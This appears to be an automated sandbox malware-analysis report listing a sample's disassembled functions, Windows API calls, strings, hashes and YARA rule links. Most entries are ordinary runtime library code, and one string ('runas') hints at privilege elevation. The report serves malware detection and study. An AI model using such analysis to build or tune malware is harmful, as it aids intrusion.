API ID: Concurrency::details::$Concurrency::critical_section::_Timer$Acquire_lockAsyncBase::ContextCurrentDerefH_prolog3LibraryLoadLockNodeNode::QueueRegisterSchedulerSwitch_to_active
String ID:
API String ID: 2559503089-0
Opcode ID: 6202bdfdb5770ea946800c78cd8ea731ca40aa09cdf17d07ebd0c2e6249b1ab2
Instruction ID: 2a51017553550b9cf705feb50000f12ad4c712ec7dc207b009f799ae5d4e6c45
Opcode Fuzzy Hash: 6202bdfdb5770ea946800c78cd8ea731ca40aa09cdf17d07ebd0c2e6249b1ab2
Instruction Fuzzy Hash: C5F0E9B1E0020C6B9F37BE7548609FD36974F80364B844169E5169F7C0CF748F049EA4

Function 00429510 Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 00429519

Part of subcall function 0041F4CB: Concurrency::details::SchedulerBase::GetDefaultScheduler.LIBCONCRT ref: 00425486

Concurrency::details::ContextBase::CancelCollection.LIBCONCRT ref: 0042953D
Concurrency::details::_TaskCollectionBase::_FinishCancelState.LIBCMT ref: 00429550
Concurrency::details::ContextBase::CancelStealers.LIBCMT ref: 00429559

Memory Dump Source

Source File: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685965706.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685965706.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: Base::Concurrency::details::$CancelContextScheduler$Collection$Base::_Concurrency::details::_CurrentDefaultFinishStateStealersTask
String ID:
API String ID: 218105897-0
Opcode ID: 286b84610833cc548c653b23f9a84c5695ef3105fb3579eb3866e9586b336a7e
Instruction ID: d6309d90a18d788d3908b1ccc534cdb32d682efef3bce2effefe7705fdda7df8
Opcode Fuzzy Hash: 286b84610833cc548c653b23f9a84c5695ef3105fb3579eb3866e9586b336a7e
Instruction Fuzzy Hash: ADF0A731700A306FE662AB55A811F6B23D49F44719F40951FE41B97282CE2CEC82CB99

Function 02366D36 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(02328A07,0000000F,0045FB20,00000000,02328A07,?,02365421,02328A07,00000001,02328A07,02328A07,?,023602FC,00000000,?,02328A07), ref: 02366D4D
GetLastError.KERNEL32(?,02365421,02328A07,00000001,02328A07,02328A07,?,023602FC,00000000,?,02328A07,00000000,02328A07,?,02360850,02328A07), ref: 02366D59

Part of subcall function 02366D1F: CloseHandle.KERNEL32(00462970,02366D69,?,02365421,02328A07,00000001,02328A07,02328A07,?,023602FC,00000000,?,02328A07,00000000,02328A07), ref: 02366D2F

___initconout.LIBCMT ref: 02366D69

Part of subcall function 02366CE1: CreateFileW.KERNEL32(00457658,40000000,00000003,00000000,00000003,00000000,00000000,02366D10,0236540E,02328A07,?,023602FC,00000000,?,02328A07,00000000), ref: 02366CF4

WriteConsoleW.KERNEL32(02328A07,0000000F,0045FB20,00000000,?,02365421,02328A07,00000001,02328A07,02328A07,?,023602FC,00000000,?,02328A07,00000000), ref: 02366D7E

Memory Dump Source

Source File: 00000000.00000002.1686647443.0000000002320000.00000040.00001000.00020000.00000000.sdmp, Offset: 02320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2320000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 68f8837eb1d4a2712d10f3c5b8a7bf099e143a904c0dfdbb60282304a99716f4
Instruction ID: dbb6264821405fd44464c655bdbe3fb295475429bafe8c7f67741bbdb937c9dd
Opcode Fuzzy Hash: 68f8837eb1d4a2712d10f3c5b8a7bf099e143a904c0dfdbb60282304a99716f4
Instruction Fuzzy Hash: 57F0F836101254BBCF621FA6AC0DA997E2AEB493A1F108022FA1885130D672C820DF95

Function 00446ACF Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(004087A0,0000000F,0045FB20,00000000,004087A0,?,004451BA,004087A0,00000001,004087A0,004087A0,?,00440095,00000000,?,004087A0), ref: 00446AE6
GetLastError.KERNEL32(?,004451BA,004087A0,00000001,004087A0,004087A0,?,00440095,00000000,?,004087A0,00000000,004087A0,?,004405E9,004087A0), ref: 00446AF2

Part of subcall function 00446AB8: CloseHandle.KERNEL32(FFFFFFFE,00446B02,?,004451BA,004087A0,00000001,004087A0,004087A0,?,00440095,00000000,?,004087A0,00000000,004087A0), ref: 00446AC8

___initconout.LIBCMT ref: 00446B02

Part of subcall function 00446A7A: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00446AA9,004451A7,004087A0,?,00440095,00000000,?,004087A0,00000000), ref: 00446A8D

WriteConsoleW.KERNEL32(004087A0,0000000F,0045FB20,00000000,?,004451BA,004087A0,00000001,004087A0,004087A0,?,00440095,00000000,?,004087A0,00000000), ref: 00446B17

Memory Dump Source

Source File: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685965706.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685965706.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 68f8837eb1d4a2712d10f3c5b8a7bf099e143a904c0dfdbb60282304a99716f4
Instruction ID: 2847bb895f9299352194151eea3b2518d9960724f28a171724648c66562c6119
Opcode Fuzzy Hash: 68f8837eb1d4a2712d10f3c5b8a7bf099e143a904c0dfdbb60282304a99716f4
Instruction Fuzzy Hash: 1DF03736101664BBDF621FA5DC089DA3F65FB457A2F014022FE1C95131D672DC20DB9A

Function 02327A17 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 468sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(000003E8), ref: 02327CE0

Strings

runas, xrefs: 0232756A

Memory Dump Source

Source File: 00000000.00000002.1686647443.0000000002320000.00000040.00001000.00020000.00000000.sdmp, Offset: 02320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2320000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: runas
API String ID: 3472027048-4000483414
Opcode ID: b12352c27eb35c7801b30b77c84677b55ae88f5f3268c2bda28ff34a47bf5de4
Instruction ID: c0ad32c31b306a002929a8caf2c1398c92e8596a7f458cac65d47fcfcb2aac76
Opcode Fuzzy Hash: b12352c27eb35c7801b30b77c84677b55ae88f5f3268c2bda28ff34a47bf5de4
Instruction Fuzzy Hash: B4E15771A10258ABEB19EB38CD85B9DFB73EF41704F60865CE400AB3C5DB359B448B92

Function 0043E6C4 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 166COMMON

Download Yara Rule

APIs

Part of subcall function 0043E259: GetOEMCP.KERNEL32(00000000,0043E4CB,?,?,avC,00437661,?), ref: 0043E284

IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,avC,0043E512,?,00000000,?,?,?,?,?,?,00437661), ref: 0043E722
GetCPInfo.KERNEL32(00000000,0043E512,?,avC,0043E512,?,00000000,?,?,?,?,?,?,00437661,?), ref: 0043E764

Strings

avC, xrefs: 0043E6C6

Memory Dump Source

Source File: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685965706.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685965706.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: CodeInfoPageValid
String ID: avC
API String ID: 546120528-551859807
Opcode ID: 40678aea89edd431b2c9a3e3bda96fb4224bb9d3af1647208ffe2423ccba4704
Instruction ID: 7136e37640ab4f9cfa26bf5a46befe49b79dc652285453c6057786630530e70e
Opcode Fuzzy Hash: 40678aea89edd431b2c9a3e3bda96fb4224bb9d3af1647208ffe2423ccba4704
Instruction Fuzzy Hash: C6512370E012059EEB249F73C8806ABBBF5EF88304F14646FD096973D2E7789546CB99

Function 0044532F Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 158fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

ReadFile.KERNEL32(?,?,00000002,?,00000000,?,00000000,?), ref: 0044540D

Strings

)ZD, xrefs: 00445363
)ZD, xrefs: 004453BB, 004454C9

Memory Dump Source

Source File: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685965706.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685965706.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: FileRead
String ID: )ZD$)ZD
API String ID: 2738559852-3993371512
Opcode ID: 0eb56316cf27b920e1eb67f398ea9860885408d35e2d831988382829233ef988
Instruction ID: fc353a334f2b284155b366ba4413ab3dfc7edfe09a6423858d2821c62ff71e0d
Opcode Fuzzy Hash: 0eb56316cf27b920e1eb67f398ea9860885408d35e2d831988382829233ef988
Instruction Fuzzy Hash: 4651E731A04619EBDF20CF58C881BEDB7B0FF05314F20856AD855AB392E3785981CB99

Function 0235E717 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100COMMON

Download Yara Rule

APIs

Part of subcall function 0235E4C0: GetOEMCP.KERNEL32(00000000,0235E732,?,?,023578C8,023578C8,?), ref: 0235E4EB

_free.LIBCMT ref: 0235E78F

Strings

@"F, xrefs: 0235E7B7

Memory Dump Source

Source File: 00000000.00000002.1686647443.0000000002320000.00000040.00001000.00020000.00000000.sdmp, Offset: 02320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2320000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: _free
String ID: @"F
API String ID: 269201875-3084318295
Opcode ID: 9908dd6ab1a80c5fc09db8b12665e78ab5e05ea3aa24e2a155a3ad1beaefeb8c
Instruction ID: 5773295d832b6a179771054d5fbddd2b232a13c37193b149a28c382fdc2e67cc
Opcode Fuzzy Hash: 9908dd6ab1a80c5fc09db8b12665e78ab5e05ea3aa24e2a155a3ad1beaefeb8c
Instruction Fuzzy Hash: 96319272904269AFDB21DF58D880F9E7BF6FF44314F150469ED18972A0EB719A50CF50

Function 0235EF33 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0235EF95
_free.LIBCMT ref: 0235EFC3

Part of subcall function 02356EEE: IsProcessorFeaturePresent.KERNEL32(00000017,02356EC0,00000000,00000000,00000000,00000000,00000000,?,?,02356ECD,00000000,00000000,00000000,00000000,00000000,023224B9), ref: 02356EF0
Part of subcall function 02356EEE: GetCurrentProcess.KERNEL32(C0000417,00000000,00000000,023224B9), ref: 02356F13
Part of subcall function 02356EEE: TerminateProcess.KERNEL32(00000000), ref: 02356F1A

Strings

2y, xrefs: 0235EFE3, 0235EFF0, 0235EFF7

Memory Dump Source

Source File: 00000000.00000002.1686647443.0000000002320000.00000040.00001000.00020000.00000000.sdmp, Offset: 02320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2320000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: Process_free$CurrentFeaturePresentProcessorTerminate
String ID: 2y
API String ID: 2728292959-546834805
Opcode ID: 553cbc0afee967512f1f097e7ca1b1d9603173481dcf94bbb58fc8132d96ba0b
Instruction ID: 40f448a66639dc54cb2bd4c48d30d97d7b07e5c0256820f90d6379385a9b3ddc
Opcode Fuzzy Hash: 553cbc0afee967512f1f097e7ca1b1d9603173481dcf94bbb58fc8132d96ba0b
Instruction Fuzzy Hash: 5E21C6766093269BDF389FA4D844F6577A69F44714F2A0079EC0DCB185EF72DA40CB50

Function 0043ECCC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0043ED2E
_free.LIBCMT ref: 0043ED5C

Part of subcall function 00438BEC: IsProcessorFeaturePresent.KERNEL32(00000017,0043A72D,?,?,0043694A,?,?,?,?,00437661,?), ref: 00438C08

Part of subcall function 00436C87: IsProcessorFeaturePresent.KERNEL32(00000017,00436C59,00000000,00000000,00000000,00000000,00000000,?,?,00436C66,00000000,00000000,00000000,00000000,00000000,00402252), ref: 00436C89
Part of subcall function 00436C87: GetCurrentProcess.KERNEL32(C0000417,00000000,00000000,00402252), ref: 00436CAC
Part of subcall function 00436C87: TerminateProcess.KERNEL32(00000000), ref: 00436CB3

Strings

2y, xrefs: 0043ED7C, 0043ED90

Memory Dump Source

Source File: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685965706.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685965706.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: FeaturePresentProcessProcessor_free$CurrentTerminate
String ID: 2y
API String ID: 1729132349-546834805
Opcode ID: dc94eed38f6bdcf8a0be89209a2185b2d5ae6107472d6f0e551bdea946d6cc3c
Instruction ID: eb2697801c343fc280f5209bf9b81a9da0e8eee6adb0fa94813e244574a19da4
Opcode Fuzzy Hash: dc94eed38f6bdcf8a0be89209a2185b2d5ae6107472d6f0e551bdea946d6cc3c
Instruction Fuzzy Hash: 562104716052029FEF289FA6E845B2A73A5EF4C314F24203FF845DB2C5E67ADC41C658

Function 0041B5D6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73COMMONLIBRARYCODE

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 0041B65E
RaiseException.KERNEL32(?,?,?,?), ref: 0041B683

Part of subcall function 00433B04: RaiseException.KERNEL32(E06D7363,00000001,00000003,0045E3B0,?,?,?,0045E3B0), ref: 00433B64

Part of subcall function 00438BEC: IsProcessorFeaturePresent.KERNEL32(00000017,0043A72D,?,?,0043694A,?,?,?,?,00437661,?), ref: 00438C08

Strings

csm, xrefs: 0041B612

Memory Dump Source

Source File: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685965706.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685965706.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: ExceptionRaise$FeaturePresentProcessor__alloca_probe_16
String ID: csm
API String ID: 1924019822-1018135373
Opcode ID: ad5d9faefd0c1ab4e9a02e3e4909efcbe63737fe706ed9a567fc9c955821b515
Instruction ID: 9f88b0b7aede3b21d37810e77ce6789f3a807ab352a7de9bd37fa5025d97b667
Opcode Fuzzy Hash: ad5d9faefd0c1ab4e9a02e3e4909efcbe63737fe706ed9a567fc9c955821b515
Instruction Fuzzy Hash: A721AF31D01218AFCF24DF96C945AEFB7B8EF24714F14441AE845AB251CB38AD85CBCA

Function 00431704 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69COMMON

Download Yara Rule

APIs

Concurrency::details::FreeVirtualProcessorRoot::SpinUntilIdle.LIBCONCRT ref: 00431764
std::invalid_argument::invalid_argument.LIBCONCRT ref: 004317AF

Strings

pContext, xrefs: 004317A7

Memory Dump Source

Source File: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685965706.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685965706.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: Concurrency::details::FreeIdleProcessorRoot::SpinUntilVirtualstd::invalid_argument::invalid_argument
String ID: pContext
API String ID: 3390424672-2046700901
Opcode ID: 022a27bc18fa5d8226aa9ea097ec315d7e10c5cb17fb68df421d1453c8f8c9ce
Instruction ID: 942ad2940211714a74bcc9dfb36523be2d48a1416fc9e5f4f6d4d921a905eb8f
Opcode Fuzzy Hash: 022a27bc18fa5d8226aa9ea097ec315d7e10c5cb17fb68df421d1453c8f8c9ce
Instruction Fuzzy Hash: 2F113639A002149BCB05FF58C88596D77A5AF8C365F18406BEC0297362DB3CED05CBD8

Function 0041CFF1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0041D21A
___raise_securityfailure.LIBCMT ref: 0041D301

Strings

pWF, xrefs: 0041D2FC

Memory Dump Source

Source File: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685965706.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685965706.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: FeaturePresentProcessor___raise_securityfailure
String ID: pWF
API String ID: 3761405300-3254099572
Opcode ID: 8d6445971c7e0862906b7c68462026e959eab2d4c9270191dfb96f7b545bb8f5
Instruction ID: 8fd7279893b741caf15dcd92eb45e819b2951614e4b3fd08056ab3288de795f0
Opcode Fuzzy Hash: 8d6445971c7e0862906b7c68462026e959eab2d4c9270191dfb96f7b545bb8f5
Instruction Fuzzy Hash: D121BDB5600A04DAE714EF26F945A583BE4FB48304F54553AEA049BAB1F3F498A1CF0E

Function 0235A995 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0235A9E5
_free.LIBCMT ref: 0235AA19

Strings

x!F, xrefs: 0235AA0C

Memory Dump Source

Source File: 00000000.00000002.1686647443.0000000002320000.00000040.00001000.00020000.00000000.sdmp, Offset: 02320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2320000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: _free
String ID: x!F
API String ID: 269201875-3062043068
Opcode ID: db21be25886df150d1c6f332858b9cadf02cf268a657b562b65237ce8408447b
Instruction ID: 3405476d71ed3f54c22c33ef4bdfa83366d1452c24ee3917ada57a63e10d2c68
Opcode Fuzzy Hash: db21be25886df150d1c6f332858b9cadf02cf268a657b562b65237ce8408447b
Instruction Fuzzy Hash: A801D031519A31BAD6317374AE00EBE539B6F02B34B550321FD1CA51E4EB928C1155D6

Function 0043A72E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0043A77E
_free.LIBCMT ref: 0043A7B2

Strings

x!F, xrefs: 0043A7A5

Memory Dump Source

Source File: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685965706.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685965706.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: _free
String ID: x!F
API String ID: 269201875-3062043068
Opcode ID: db21be25886df150d1c6f332858b9cadf02cf268a657b562b65237ce8408447b
Instruction ID: a9be1d7356db9bde33694ffb89096973f5cd6b257b37c16ae0656b7abf5e94eb
Opcode Fuzzy Hash: db21be25886df150d1c6f332858b9cadf02cf268a657b562b65237ce8408447b
Instruction Fuzzy Hash: 0F01D831985A203AD52532355C82B6B12299B0D72CF20322BFBA0653E2FB8DCC3201DF

Function 00420C5C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::_NonReentrantLock::_Acquire.LIBCONCRT ref: 00420CD7
Concurrency::details::ResourceManager::ResourceManager.LIBCONCRT ref: 00420D2A

Strings

p[F, xrefs: 00420CCF

Memory Dump Source

Source File: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685965706.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685965706.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: Resource$AcquireConcurrency::details::Concurrency::details::_Lock::_ManagerManager::Reentrant
String ID: p[F
API String ID: 3303180142-1832964472
Opcode ID: be93dd124044e3a26704792a574e288825ec5497b2495a662014ec0407777033
Instruction ID: 460490d00550286d74d196cd5a9549fc7c942c0fed1932104b3464a6bc3d5762
Opcode Fuzzy Hash: be93dd124044e3a26704792a574e288825ec5497b2495a662014ec0407777033
Instruction Fuzzy Hash: 510180B0F156249EDB10ABBA755135DA6E06B08318FA0406FE405EB283DA7C5E41876E

Function 0043E259 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON

Download Yara Rule

APIs

GetOEMCP.KERNEL32(00000000,0043E4CB,?,?,avC,00437661,?), ref: 0043E284
GetACP.KERNEL32(00000000,0043E4CB,?,?,avC,00437661,?), ref: 0043E29B

Strings

avC, xrefs: 0043E25B

Memory Dump Source

Source File: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685965706.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685965706.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID:
String ID: avC
API String ID: 0-551859807
Opcode ID: 45530060523da157e537cdb1f7866b3f2572323f108b7a3cdd4d943330284399
Instruction ID: 791638059a19eb7d03b8e6799ac96854013f7a9a4db5e4c168316c4cba85a157
Opcode Fuzzy Hash: 45530060523da157e537cdb1f7866b3f2572323f108b7a3cdd4d943330284399
Instruction Fuzzy Hash: 15F0F630801202CBE704DFA6E8097AE37B4AB45339F1103D5E439962E2D7B4A841C78A

Function 0233D378 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(00465750), ref: 0233D383
RtlLeaveCriticalSection.NTDLL(00465750), ref: 0233D3C0

Strings

PWF, xrefs: 0233D37D

Memory Dump Source

Source File: 00000000.00000002.1686647443.0000000002320000.00000040.00001000.00020000.00000000.sdmp, Offset: 02320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2320000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave
String ID: PWF
API String ID: 3168844106-4189640852
Opcode ID: aa3b7ebb98d861874e14c42a3fd8d5994544321a17c487eeef023a4b97522d77
Instruction ID: 1cf081b34065695401b380c7129e11483aef2015197d0db6f882e8009033f2ab
Opcode Fuzzy Hash: aa3b7ebb98d861874e14c42a3fd8d5994544321a17c487eeef023a4b97522d77
Instruction Fuzzy Hash: C1F05534200608DFC326AF14EC44B25B7F8EB41736F20023EEA56876E0DB31AD42CA1A

Function 0041D111 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(00465750), ref: 0041D11C
RtlLeaveCriticalSection.NTDLL(00465750), ref: 0041D159

Strings

PWF, xrefs: 0041D116

Memory Dump Source

Source File: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685965706.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685965706.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave
String ID: PWF
API String ID: 3168844106-4189640852
Opcode ID: aa3b7ebb98d861874e14c42a3fd8d5994544321a17c487eeef023a4b97522d77
Instruction ID: 988e6a820899fd4ceb20f62ffb6a68805dae8dfe7a3415f919f541f0d2922133
Opcode Fuzzy Hash: aa3b7ebb98d861874e14c42a3fd8d5994544321a17c487eeef023a4b97522d77
Instruction Fuzzy Hash: 16F0E275900601EFC3149F14EC44AA677A5EB45736F20022EEA55473D0D7391C82CA1A

Function 0042B92C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28threadCOMMON

Download Yara Rule

APIs

Concurrency::details::FreeThreadProxy::ReturnIdleProxy.LIBCONCRT ref: 0042B94E
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042B961

Strings

pContext, xrefs: 0042B959

Memory Dump Source

Source File: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685965706.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685965706.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: Concurrency::details::FreeIdleProxyProxy::ReturnThreadstd::invalid_argument::invalid_argument
String ID: pContext
API String ID: 548886458-2046700901
Opcode ID: cb3ebfd47da852ef65d275a916c0fe48e2a73adc5c276bf3244062de85799675
Instruction ID: 6d6ffe11be8a4b1ace8c2f2c8a58b350c0e533cc07d7fbfc7cd1cba97992ca6a
Opcode Fuzzy Hash: cb3ebfd47da852ef65d275a916c0fe48e2a73adc5c276bf3244062de85799675
Instruction Fuzzy Hash: 95E02B39B0020467CB04F7A5D845D9DBB789E84715710401BE911A3352EB78AA44C6D8

Function 023425B1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0234255C
Concurrency::details::_NonReentrantLock::_Acquire.LIBCONCRT ref: 02342572

Part of subcall function 02342A99: Concurrency::details::ResourceManager::RetrieveSystemVersionInformation.LIBCONCRT ref: 02342AA8
Part of subcall function 02342A99: Concurrency::details::ResourceManager::CaptureProcessAffinity.LIBCONCRT ref: 02342ABC
Part of subcall function 02342A99: Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 02342ADD
Part of subcall function 02342A99: Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 02342B46
Part of subcall function 02342A99: Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 02342CB4

Strings

p[F, xrefs: 0234256A

Memory Dump Source

Source File: 00000000.00000002.1686647443.0000000002320000.00000040.00001000.00020000.00000000.sdmp, Offset: 02320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2320000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: Concurrency::details::Manager::Resource$Information$AffinityTopology$AcquireApplyCaptureCleanupConcurrency::details::_H_prolog3Lock::_ProcessReentrantRestrictionsRetrieveSystemVersion
String ID: p[F
API String ID: 3302332639-1832964472
Opcode ID: 84bf9b1e625644d46c927a665ec91d8dc20bfdb3b0587f4fa2234934793136a5
Instruction ID: 9b443f1fa015abc27dbddd007219c009f284d7430ea8b2d8fe85893268226a08
Opcode Fuzzy Hash: 84bf9b1e625644d46c927a665ec91d8dc20bfdb3b0587f4fa2234934793136a5
Instruction Fuzzy Hash: 24E04FB0700605D7DB24EBA6E93076A73E9EB08B41F8008AAE504DF250EFB5F5008F29

Function 004234CC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

std::invalid_argument::invalid_argument.LIBCONCRT ref: 004234FC

Strings

pScheduler, xrefs: 004234F4
version, xrefs: 004234E1

Memory Dump Source

Source File: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685965706.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685965706.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: std::invalid_argument::invalid_argument
String ID: pScheduler$version
API String ID: 2141394445-3154422776
